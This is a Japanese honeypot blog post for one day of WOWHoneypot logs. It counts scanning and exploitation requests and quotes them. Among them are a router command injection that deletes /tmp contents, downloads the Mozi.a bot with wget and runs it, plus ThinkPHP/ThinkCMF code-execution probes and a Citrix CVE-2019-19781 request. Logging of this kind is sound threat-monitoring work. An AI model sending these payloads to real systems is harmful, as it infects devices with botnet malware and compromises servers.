23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(302日目)

2020/01/12(日)

トータルは231件でした。

ハンティングログはありませんでした。

114.228.226[.]204 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.a

www.virustotal.com

件数 概要 リクエス
139 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
62 アクセス GET /
6 調査 GET /script
3 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
2 クローリング GET /robots.txt
2 アクセス GET /favicon.ico
2 phpMyAdminの調査 GET /admin-scripts.asp
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 PixelStor 5000の脆弱性(CVE-2020-6756)を狙った通信 POST /Option/languageOptions.php
1 Citritx製品の脆弱性(CVE-2019-19781)を狙った通信 GET /vpns/cfg/smb.conf
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 ルータの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
1 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 WordPressの調査 GET //wp-content/plugins/apikey/apikey.php?test=hello


Citritx製品の脆弱性(CVE-2019-19781)を狙った通信を観測しました。

GET /vpns/cfg/smb.conf HTTP/1.0
Host: localhost
User-Agent: Mozilla/5.0
Accept: */*
Connection: close